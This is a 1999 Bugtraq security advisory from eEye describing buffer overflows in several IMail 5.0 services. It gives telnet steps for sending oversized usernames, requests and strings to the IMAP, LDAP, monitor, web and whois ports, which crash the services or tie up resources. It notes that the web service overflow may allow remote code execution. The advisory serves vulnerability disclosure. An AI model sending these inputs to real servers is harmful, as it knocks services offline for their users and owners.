From marc@EEYE.COM Wed Mar 3 03:00:41 1999 From: Marc To: BUGTRAQ@netspace.org Date: Mon, 1 Mar 1999 23:30:21 -0800 Subject: Multiple IMail Vulnerabilites [The following text is in the "iso-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] ________________________________________________________________________ eEye Digital Security Team www.eEye.com info@eEye.com March 1, 1999 ________________________________________________________________________ Multiple IMail Vulnerabilites Systems Affected IMail 5.0 Release Date March 1, 1999 Advisory Code AD03011999 ________________________________________________________________________ Description: ________________________________________________________________________ The following holes can be used as a Denial of Service against the various services mentioned and in some cases used to remotely execute code. ---> Imapd (143) The imapd login process does not do proper bounds checking on usernames and passwords. * OK IMAP4 Server (IMail 4.06) X LOGIN glob1 glob2 Where glob1 is 1200 characters and glob2 is 1300 characters. The imapd service will crash with the usuall overflow error. ---> LDAP (389) Telnet to server.com 389 Send: Y glob1 hit enter twice Server Returns: 0 Send: Y glob2 hit enter Where glob1 and glob2 are 2375 characters and Y is Y. The ldap service goes to 90 percent or so and idles there. Therefore using up most system resources. ---> IMonitor (8181) Telnet to server.com 8181 Send: glob1 hit enter twice Where glob1 is 2045 characters. The IMonitor service crashes with the normal overflow message. ---> IMail Web Service (8383) Telnet to server.com 8383 Send: GET /glob1/ Where glob1 is 3000 characters. The usual overflow message will be displayed. This one looks to be easily exploitable. >:-] ---> Whois32 Daemon (43) Telnet to server.com 43 Send glob1 Where glob1 is 1000 characters. The usual overflow message will be displayed. Ya... starting to sound old. ________________________________________________________________________ Vendor Status ________________________________________________________________________ Vendor has been notified, Waiting for response... ________________________________________________________________________ Copyright (c) 1999 eEye Digital Security Team ________________________________________________________________________ Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission. ________________________________________________________________________ Disclaimer: ________________________________________________________________________ The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: eEye Digital Security Team info@eEye.com http://www.eEye.com